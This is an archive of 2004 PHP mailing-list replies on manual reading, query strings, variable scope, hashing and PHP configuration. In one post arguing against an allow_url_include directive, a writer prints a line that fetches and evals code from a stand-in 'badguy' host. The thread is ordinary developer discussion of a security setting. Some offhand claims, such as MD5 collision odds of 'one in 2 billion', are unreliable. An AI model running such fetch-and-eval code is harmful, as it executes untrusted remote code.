>and over. Such as arrays, strings, sessions, objects, and a few others.
>My question is this, when I'm reading the manual, is just that I should
be
>concentrating on a few sections (and if so, which?), or should I be
giving
>equal attention to all the sections, including some (I suppose) I might
>never use.

I have found that when learning a new language that it is a good idea to
read the whole manual it time permits, even it there are sections that you
don't think you will ever need. Later on when programming you may need to
do something and remember that function that you never thought you would
need. It never hurts to no what's available even if you don't think you
will need it.

Ron Clark
System Administrator
Armstrong Atlantic State University

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] a question about the PHP manual

[Nick Talbott]

On Thursday 09 December 2004 1:56 pm, Eakin, W wrote:
> I've noticed that most of the replies to the questions on this list,
> when they refer to a part of the manual,  point to the same few sections
> over and over. Such as arrays, strings, sessions, objects, and a few
> others. My question is this, when I'm reading the manual, is just that I
> should be concentrating on a few sections (and if so, which?), or should I
> be giving equal attention to all the sections, including some (I suppose) I
> might never use.

Here's a suggestion...

Go through Section III on Language Reference thoroughly.  You'll need to 
understand pretty much all of this.

Skim though sections IV and V (Security and Features) so you know what's there 
and come back to them before you use PHP in a real application (specially the 
Security section!)

In the function reference, look in detail at the following sections:
- Array functions
- Date and Time functions
- Directory Functions
- Filesystem functions
- String Functions
- Variable Functions
- plus the specific section for the database you want to use
The above are all pretty common requirements in most PHP applications.

Then skim though the following sections and come back to them when you need to 
use them:
- Error Handling and Logging Functions
- HTTP Functions
- Miscellaneous Functions
- Network Functions
- Regular Expression Functions

Then dig into the other sections in the function reference that interest you.

My 2p

- Nick


-- 
Nick Talbott, Powys County Council, UK
IT Policy and Strategy Manager/Rheolwr Polisi a Chynllunio TGCh

email: [EMAIL PROTECTED]
fax:   01597 824781
web:   www.powys.gov.uk

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question:maybe urldecode

[Stuart Felenstein]

--- "Ford, Mike" <[EMAIL PROTECTED]> wrote:

> > Lastly, I wasn't concerned about the hex code, but
> I just made some reconnections of scripts.  Users
> can save their search parameters.  I am saving the
> query string.  Now I had this set up before and the 
> way it "was" working , is when the user wanted to   
> view or edit their saved searches, the search page  
> would come back with all the parameters filled in   
> including shaded parameters in things like multi
> select lists and menu dropdowns.  It's not working  
> that way now so my first suspicion is perhaps the
hex > is effecting it.


I'm not sure if this particular is a matter of
debugging.  There is a different behaviour going on
and now I'm not sure if it would have anything to with
the hex.  The textfields in the query string are just
the variable name = value.  

Basically I'm throwing this out though since I'm
wondering if there is something that should be in the
search script , that when I apply a query string to it
would fill in the field (like magic hands)

As an example, if you click on the link , you'll see
industry has 2 choices selected , and city has a
value.
Now I can't reproduce this with my new script.

http://www.lurkingforwork.com/LFWSearch.php?s_Industry[]=2&s_Industry[]=3&s_LocationCity=Bronx&s_JobTitle=&s_PostStart=&VendorJobsPageSize=


Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] MYSQL Query question

[Raditha Dissanayake]

John Nichel wrote:
Raditha Dissanayake wrote:
Reinhart Viane wrote:
And a last question:
I always seem to get stuck on mysql queries when scripting. mysql.com
gives me a headache whens earching something. Does someone know a good
mysql manual site or a good mysql book?
 

That does not mean mysql questions should be posted on php mailing 
lists.

There you go again, trying to keep this list on topic. ;)
Alright I am going to change. as they say if you can't beat them join them.
obligatory off topic post:
Do you think it's better to use innodb type tables or myisam type tables 
when using mysql even without  foreign keys?

--
Raditha Dissanayake.
--
http://www.radinks.com/print/card-designer/ | Card Designer Applet
http://www.radinks.com/upload/  | Drag and Drop Upload 

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Finding the location of an included script

[Gadi Cohen]

Is this possible?

I'm trying to write a back end to be used in most of my websites.

While I can simply use symlinks to ensure this is included from my
various sites but only exists once on the hardrive, I'd prefer to simply
include the file and have the script itself work out where it lives.

So if I have:  include("/path/to/backend.php");

Is there a way from inside of backend.php to return "/path/to" ?

Gadi

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Jason Wong]

On Thursday 09 December 2004 23:16, Stuart Felenstein wrote:

> I'm not sure if this particular is a matter of
> debugging. 

Your program doesn't work the way you intended it? So if you don't debug it, 
how is it going to get from a "not working as intended" state, to a working 
state?

> There is a different behaviour going on 
> and now I'm not sure if it would have anything to with
> the hex.  The textfields in the query string are just
> the variable name = value.

So what do the variables contain at each stage? Where do they change from 
"what you expected" to "not what you expected"?.

> Basically I'm throwing this out though since I'm
> wondering if there is something that should be in the
> search script , that when I apply a query string to it
> would fill in the field (like magic hands)

Yeah I wish I had some magic hands that writes my programs for me too. 
Sadly ...

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
The days are all empty and the nights are unreal.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Stuart Felenstein]

--- Jason Wong <[EMAIL PROTECTED]> wrote:

> > Basically I'm throwing this out though since I'm
> > wondering if there is something that should be in
> the
> > search script , that when I apply a query string
> to it
> > would fill in the field (like magic hands)
> 
> Yeah I wish I had some magic hands that writes my
> programs for me too. 
> Sadly ...
> 
Jason, I don't think you read or understood my
question. As I said, it doesn't seem to be a debugging
scenario.I was asking if anyone would know a
reason why on one page , one could apply the query 
string to  url and the page would be filled in and
another page it doesnt work.  Please don't imply I'm
looking for someone to write my programs. The magic
hands was a reference to how the boxes are filled in
by placing the string in.

Stuart  

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Finding the location of an included script

[Ben Ramsey]

Gadi Cohen wrote:
So if I have:  include("/path/to/backend.php");
Is there a way from inside of backend.php to return "/path/to" ?
Check out the filesystem functions in the PHP manual. You're probably 
particularly interested in pathinfo()

http://www.php.net/pathinfo
--
Ben Ramsey
Zend Certified Engineer
http://benramsey.com
---
Atlanta PHP - http://www.atlphp.org/
The Southeast's premier PHP community.
---
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] a question about the PHP manual

[Richard Lynch]

Eakin, W wrote:
> Hello,
> As I'm studying, and learning, PHP, I use certain resources again
> and again. A few books I've bought, some web sites, this mailing list,
> and the PHP manual. I've taken the often repeated 'RTFM' to heart, and I
> attempt to google or RTFM before considering a post to the list with a
> question, but now I have a question about the manual itself.
> I've noticed that most of the replies to the questions on this list,
> when they refer to a part of the manual,  point to the same few sections
> over and over. Such as arrays, strings, sessions, objects, and a few
> others.
> My question is this, when I'm reading the manual, is just that I should
> be concentrating on a few sections (and if so, which?), or should I be
> giving equal attention to all the sections, including some (I suppose) I
> might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO
"Section VI: Function Reference"

All of that stuff is what defines the core PHP Language, and if you don't
know it, you're going to waste a lot of time on Voodoo Programming.

Voodoo Programming: You do things that "work" but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your buddy;
But if you don't, and can only describe what you want in a paragraph of a
question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each "function reference"
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as "irrelevant for all time to me" :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when, because
while I had *read* the FAQ initially, there were FAQs I didn't even
understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs, and,
well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] best practice question..

[Richard Lynch]

Guy Bowden wrote:
> On this note - what is considered "best practice" in a - sent to friend
> type thing.
>
> i.e. User inputs their name + message + email + friends email into a
> html/flash form
>
> friend gets a link to read the message.
>
> currently I do this:
>
> 1 collect form input
> 2 create hash using the md5/uniqid method : $hash = md5(uniqid($key));
> 3 input data to database table using the hash as the primary key value
> 4 send email to friend with link containing the hash
> 5 user clicks on link
> 6 hash read in from the $_GET object
> 7 hash used to select message details from DB and displayed to the user
>
> There's never a security issue here - i.e. i don't mind how many times /
> who reads the message, but just want to make it hard to just guess keys
> to read other messages (otherwise it would just be the db id)
>
> This method works for me, but is it the *right* way?

I would also:

Track the sender IP address, and only allow N sends per time period T.
Track the recipient email, and only allow M "To:"s per time period U.

The point being to stop spammers from using your system to spam the world,
or target specific victims.

Is $key the ID in the database?  You may want to consider adding in "more"
randomness with mt_rand() as the manual suggests on the uniqid page -- You
can still keep $key as part of the hash by doing:
md5(uniqid("$key|" . mt_rand(), true))

Certainly sending the md5/uniquid as the only thing exposed is about as
good as you can get for making sure that the other email URLs are
guessable -- You do run the risk that sooner or later your md5/uniquid
hash will "collide" with two emails on the same value.  Easy enough to
check the db and generate another hash if they do collide, so I'd add that
in if you don't have it.  Add a line after your md5(...) call and set
$hash = '42' for testing purpose, then comment it out to go back to
reality.

You could look into the larger bits and longer hashes that would be
"better" but I really don't think that's necessary, imho.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] duplicate md5 hash's

[Richard Lynch]

>> GB> Is there any way that the same hash could have been generated more
>> than
>> GB> once?
>>
>> It's extremely unlikely (I cannot give you any stats as to how
>> unlikely though, sorry).

As I understand it (or don't, rather) the odds are one in 2,147,...,... (2
billion)

But that's only in theory.

In practice, I think people have demonstrated that it's not really 1 in 2
billion.

It's still damned unlikely, but making *SURE* with the loop you've got is
cheap and easy, so I'd stick with that.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] a question about the PHP manual

[Justin Palmer]

Hi,

Richard is spot on, but learning (PHP, ASP, Java, ...) programming is
not all about reading.  Set up small examples that better enforce the
ideas in your mind about specific topics that you are having a hard time
with.  You will loose, roughly, 90% of the information by just reading.
Examples help solidify the theories.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );



-Original Message-
From: Richard Lynch [mailto:[EMAIL PROTECTED] 
Sent: Thursday, December 09, 2004 9:15 AM
To: Eakin, W
Cc: [EMAIL PROTECTED]
Subject: Re: [PHP] a question about the PHP manual


Eakin, W wrote:
> Hello,
> As I'm studying, and learning, PHP, I use certain resources again 
> and again. A few books I've bought, some web sites, this mailing list,

> and the PHP manual. I've taken the often repeated 'RTFM' to heart, and

> I attempt to google or RTFM before considering a post to the list with

> a question, but now I have a question about the manual itself. I've 
> noticed that most of the replies to the questions on this list, when 
> they refer to a part of the manual,  point to the same few sections 
> over and over. Such as arrays, strings, sessions, objects, and a few 
> others. My question is this, when I'm reading the manual, is just that

> I should be concentrating on a few sections (and if so, which?), or 
> should I be giving equal attention to all the sections, including some

> (I suppose) I might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO "Section
VI: Function Reference"

All of that stuff is what defines the core PHP Language, and if you
don't know it, you're going to waste a lot of time on Voodoo
Programming.

Voodoo Programming: You do things that "work" but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your
buddy; But if you don't, and can only describe what you want in a
paragraph of a question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each "function reference"
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as "irrelevant for all time to me" :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when,
because while I had *read* the FAQ initially, there were FAQs I didn't
even understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs,
and, well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question: urldecode

[Richard Lynch]

Stuart Felenstein wrote:
> In my search page, the url returned comes back with
> the ..err I forget what it's called, but query string
> looks like this: %5B%5D=3.  I think the %5B and 5D
> should be [].
>
> What I think is needed is rawurldecode.  I've looked
> through my code and think it belongs somewhere in this
> block:

Don't guess.

Figure out *EXACTLY* where and when the URL is being encoded to Hex --
where it first appears in your scripts/database/application as %5B.

Decide if it's "right" for it to be in Hex at that point.


If it's not right for it to be Hex at that point, change it there.

You'll drive yourself crazy changing it here, where it's already in the
system in a format you don't want.

My *GUESS* is that you're taking the QUERY string and stuffing it into
your database.

Since you grab the raw query string, it's in Hex-encoded format.

Maybe that's a Good Thing to store in your database.

Maybe it's not.

All depends what you're going to do with it in the *REST* of the application.

But I cannot stress enough that you've got to understand where and how
this data is coming from, in what format, and *DESIGN* your application to
have the data you want in the place you want.

Going about it like you are now, just sort of guessing at what's there and
trying to slap in a patch to change it, is going to drive you crazy in the
long run.

Your solution isn't necessarily wrong:  Your approach to making the
decision is :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Question:maybe urldecode

[Jason Wong]

On Friday 10 December 2004 00:24, Stuart Felenstein wrote:

> Jason, I don't think you read or understood my
> question. 



> As I said, it doesn't seem to be a debugging 
> scenario.I was asking if anyone would know a
> reason why on one page , one could apply the query
> string to  url and the page would be filled in and
> another page it doesnt work. 

The obvious (and banal) answer is that the pages are different. Find out what 
the significant differences are. How? If you are a genius you could do that 
with your eyes closed just by comparing the source. If you are stupid like I 
am then you would have to go through the tedious task of examining the 
contents of the variables and figure out what the heck is happening.

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Q: What is printed on the bottom of beer bottles in Minnesota?
A: Open other end.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] allow_url_fopen ini directive not enough

[Richard Lynch]

Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scripting attacks.
> This would be easily avoidable if we had a directive
> (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a Progammer is dumb enough to include/require untrusted source code,
they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned "OFF" allow_url_include but left allow_url_fopen "ON"

If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an "include" -- Still, *any* PHP
code they can execute will eventually give them control anyway.

If an attacker gains access to remote "trusted" source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really.  If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is
going to avoid this attack.  Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.

This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

[Justin Palmer]

Hi,

Every time I send a response to the list I get a auto-reply from:
[EMAIL PROTECTED]

Is there someone that I could email that can delete this user from the
list?

Thanks for any information.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Finding the location of an included script

[Jason Wong]

On Thursday 09 December 2004 22:46, Gadi Cohen wrote:
> So if I have:  include("/path/to/backend.php");
>
> Is there a way from inside of backend.php to return "/path/to" ?

  echo __FILE__;

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
I have never let my schooling interfere with my education.
  -- Mark Twain
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] PHP4 mysqli with mysql 4.1.7?

[Richard Lynch]

Francis Mak wrote:
> mysqli_query($c, "SET CHARACTER SET utf8;");

The naive user, who understands *NOTHING* about i18l (?) functions,
character sets, or anything other than American English (and not all that
up on the esoterics of grammar in that) asks:

What happens in your application if you just do:

mysql_query("SET CHARACTER SET utf8", $connection) or die(mysql_error());

right after you connect to the database?

In an ideal world, you've told MySQL to use utf8, and that would be that.

Yeah, right.

Worth a try, since it will take you 5 seconds, and *might* "just work"

You may want to repeat your question on the PHP International list, if
that's still going.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] help me split chars w/o spaces by 2... like: 2004

[ApexEleven]

I did something like this a while back, I believe I used chunk_split

[code]

[/code]

it'll output something along the lines of:
20
04

Hope this helps,

-- 
<<
Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
--->>

On Thu, 9 Dec 2004 10:21:49 +0800, Louie Miranda <[EMAIL PROTECTED]> wrote:
>  $hello2 = chop($year_split);
> echo $hello2;
> ?>
> 
> outputs: 2004
> 
> Whats the correct syntax for it? The manual said..
> 
> This function is an alias of rtrim().
> 
> and:
> 
> rtrim
> (PHP 3, PHP 4 )
> 
> rtrim --  Strip whitespace from the end of a string
> 
> 
> 
> 
> On Wed, 08 Dec 2004 18:11:19 -0800, Tyler Replogle <[EMAIL PROTECTED]> wrote:
> > have you tride using chop() ?
> > # begin code
> > $year_split = date("Y");
> > $chars = chop($year_split);
> > $chars[0] // = 2
> > $chars[1] // = 0
> > $chars[2] // = 0
> > $chars[3]  //= 4
> > # end code
> > I hope that will help
> >
> > >From: Louie Miranda <[EMAIL PROTECTED]>
> > >Reply-To: Louie Miranda <[EMAIL PROTECTED]>
> > >To: [EMAIL PROTECTED]
> > >Subject: [PHP] help me split chars w/o spaces by 2... like: 2004
> > >Date: Thu, 9 Dec 2004 09:55:57 +0800
> > >MIME-Version: 1.0
> > >Received: from pb1.pair.com ([216.92.131.4]) by mc6-f24.hotmail.com with
> > >Microsoft SMTPSVC(5.0.2195.6713); Wed, 8 Dec 2004 17:56:52 -0800
> > >Received: (qmail 21242 invoked by uid 1010); 9 Dec 2004 01:56:02 -
> > >Received: (qmail 21150 invoked by uid 1010); 9 Dec 2004 01:56:01 -
> > >X-Message-Info: 6sSXyD95QpUKIecQn+Z/xIP21pcg8LTu
> > >Mailing-List: contact [EMAIL PROTECTED]; run by ezmlm
> > >Precedence: bulk
> > >list-help: 
> > >list-unsubscribe: 
> > >list-post: 
> > >Delivered-To: mailing list [EMAIL PROTECTED]
> > >Delivered-To: [EMAIL PROTECTED]
> > >Delivered-To: [EMAIL PROTECTED]
> > >DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;s=beta;
> > >d=gmail.com;
> > >h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding;
> > >
> > >b=gp2OcpYqK7wZkSMBhO5OvxdTzhTOQdM1+n9ZtLJ4lmsKWFpVRb9Y2kyjNIrRIX/rvXeFfwCVGh7LT6kub0DMmCGdeRiLKeCjJkxK4fWxSrP2D+FexciD2lT8ASKD7TNYC3YGIZLZbk5UEJIq9Yx2TkbIdgNd/Op3+iEviy1scI4=
> > >Return-Path: [EMAIL PROTECTED]
> > >X-OriginalArrivalTime: 09 Dec 2004 01:56:53.0406 (UTC)
> > >FILETIME=[5AF313E0:01C4DD92]
> >
> >
> > >
> > >Help me split chars w/o spaces by 2... like: 2004
> > >How can i make it?
> > >
> > >first: 20
> > >second: 04
> > >
> > >Im working on this..
> > >
> > ># begin code
> > >$year_split = date("Y");
> > >$chars = preg_split('//', $year_split, -1, PREG_SPLIT_NO_EMPTY);
> > ># end code
> > >
> > >But it splits the whole "2004" string..
> > >
> > >Array
> > >(
> > > [0] => 2
> > > [1] => 0
> > > [2] => 0
> > > [3] => 4
> > >)
> > >
> > >
> > >--
> > >Louie Miranda
> > >http://www.axishift.com
> > >
> > >--
> > >PHP General Mailing List (http://www.php.net/)
> > >To unsubscribe, visit: http://www.php.net/unsub.php
> > >
> >
> >
> 
> --
> Louie Miranda
> http://www.axishift.com
> 
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
> 
> 


-- 
<<
Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
--->>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Confused - $GLOBALS

[Danny Brow]

Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.


if (array_key_exists('pictures', $_POST)) {
$how_many_pics = $_POST['pictures'];
picture_input($how_many_pics);
//process_errors();
$k = '1';
while ($k <= $how_many_pics) {
$item_pics1 .= "";
$item_pics1 .= "";
$k++;
}
html_form($title, $price, $descrip, $current_items,
$title_file_name, $errors);
} else {
print '';
print 'How Many pictures do you have?: ';
print '';
}



function html_template() {
if (file_exists('item.html')) {
$html_template = $GLOBALS['html_template'];
$html_template = str_replace('{pictures2}',
$GLOBALS['item_pics1'], $html_template);
$html_template = str_replace('{title}', $GLOBALS['title'],
$html_template);
$html_template = str_replace('{description}',
$GLOBALS['descrip'], $html_template);
$html_template = str_replace('{price}', $GLOBALS['price'],
$html_template);
$item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
"/item.html";
$item_fh = fopen($item_file_name, 'x+');
fwrite($item_fh, $html_template);
} else {
$GLOBALS['errors'] .= "item.html template does not exsit";
}
}

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] about installing php

[Richard Lynch]

satya bharti wrote:
> sir,
> I am using Red Hat Linux 8.0, and tried many times to install apache 2.0
> and php4.0  many times, the message comes that apache and php has
> installed on my system. when i execute a php program through my web
> brouser it shows blank. what causes this and how can I solve this problem?
> plz help on this matter.

Any time a PHP page shows blank, you should use your browser's "View
Source" menu to see what's *REALLY* in there.

It can help you understand what is going on most of the time.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] login.php

[Richard Lynch]

badlya badlu wrote:
> This is my first mail to php mailing list. i want to
> create one login.php program in linux. i want this
> page to go the ldap server for authentication. how
> should i do it.

http://php.net/ldap

You may also want to just use somebody else's LDAP PHP script.

I'm betting you could find one at http://phpclasses.org or just Google for
"LDAP PHP"

One thing for sure:  The mailing list community isn't going to just write
the code for you and post it here. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Close all open tags in HTML text

[Richard Lynch]

Matt Palermo wrote:
> I am allowing users to imput HTML code into a textarea.  After they input
> this, I wany to output their HTML to the browser.  In order for the
> document
> to be safe, I need to close all open HTML tags that have been left open by
> the user, along with any open comments.  Is there a way to take an HTML
> string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.

I *think* strip_tags rips out JavaScript.   RTFM to be sure.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

RE: [PHP] Question:maybe urldecode

[Stuart Felenstein]

--- Richard Lynch <[EMAIL PROTECTED]> wrote:

> Then your new script is broken, as clearly the GET
> paramters *ARE* there.

Sorry, I'm not following you.  Where are my GET
parameters ?  The way I've built my present script is
the reults page is grabbing the parameters.  Do I need
to set up GET parameters in the first/search page ?

> 
> Is the new script on a different server or in a
> different directory? 
> Perhaps with register_globals turned OFF?
> 
No , same server, The new scripts are in a different
directory then the previous one. They are not related
or call to each other.Register_globals are set to ON.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[John Nichel]

Danny Brow wrote:
Below is a snip of a program I am writing, I am a little new to php.
Any how, I can't for the life me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in a if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.

If you want to use a variable from outside the function, you either have 
to pass it to the function; if you want to change it, you have to pass 
it by reference, or make it global inside the function

function foo ( $bar ) {
/--code--/
}
function foo ( &$bar ) {
/--code--/
}
function foo() {
global $var;
/--more code--/
}
I may be mistaken, but I think the $GLOBALS array was introduced in 4.3.0.
http://us4.php.net/manual/en/language.variables.scope.php
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[John Nichel]

Belay that...the $GLOBALS array has existed since PHP3
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Object In Object

[Dinçer Akay]

Hi,
Is this a good way ?
mysql=new mysql();
$this->user=new user();
}
}

class Mysql
{
function x(){ return "Some Query Result for ";}
}
class  user
{
var $username;
function user(){$this->username="Guest";}
}
/* Other subclasses */
class Data extends main{
function getText(){
echo $this->mysql->x();
echo $this->user->username;
}
}

$class=new main();
$data=new  Data();
$data->getText();

?>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

[Danny Brow]

I'm getting it too.

On Thu, 2004-12-09 at 09:49 -0800, Justin Palmer wrote:
> Hi,
> 
> Every time I send a response to the list I get a auto-reply from:
> [EMAIL PROTECTED]
> 
> Is there someone that I could email that can delete this user from the
> list?
> 
> Thanks for any information.
> 
> Regards,
> 
> Justin Palmer
> __
> KISS (Keep It Simple, SEARCH)!
> Google::getUri( http://www.google.com );
> Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

Re: [PHP] Confused - $GLOBALS

[Danny Brow]

On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
> Danny Brow wrote:
> > Below is a snip of a program I am writing, I am a little new to php.
> > Any how, I can't for the life me figure out why one of my functions
> > cannot grab the item_pics1 variable. I have tried passing the variable
> > to the function, tried using $GLOBALS['item_pic1']. So I guess my
> > question is, does PHP in some cases need to have a variable in a if
> > statement sent back to the global scope? everything works but the
> > str_replace item_pics1. Hope this is enough code.
> 
> 
> If you want to use a variable from outside the function, you either have 
> to pass it to the function; if you want to change it, you have to pass 
> it by reference, or make it global inside the function
> 
> function foo ( $bar ) {
>   /--code--/
> }
>
> function foo ( &$bar ) {
>   /--code--/
> }
> 
> function foo() {
>   global $var;
>   /--more code--/
> }
> 
See this is where the confusion is, I've tried all these and it still
does not work.  I'm going to read the whole page on variable scope a few
times, see if I missed something.  Maybe it's something else in my code
screwing my up.

Thanks.
Dan.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php

[PHP] Re: Object In Object

[Matthew Weier O'Phinney]

* Dinçer akay <[EMAIL PROTECTED]>:
> Is this a good way ?
> 
> class main{
> var $mysql;
> var $user;
> function main(){
> $this->mysql=new mysql();
> $this->user=new user();

If you're developing strictly for PHP5, this will work fine. However, if
you're in PHP4, you're going to want to use references. Try the
following:

  $mysql   =& new mysql();
  $this->mysql =& $mysql;
  $user=& new user();
  $this->user  =& $user;

Other than that, yes, this is a fairly standard mechanism in PHP's OOP.

-- 
Matthew Weier O'Phinney   | mailto:[EMAIL PROTECTED]
Webmaster and IT Specialist   | http://www.garden.org
National Gardening Association| http://www.kidsgardening.com
802-863-5251 x156 | http://nationalgardenmonth.org
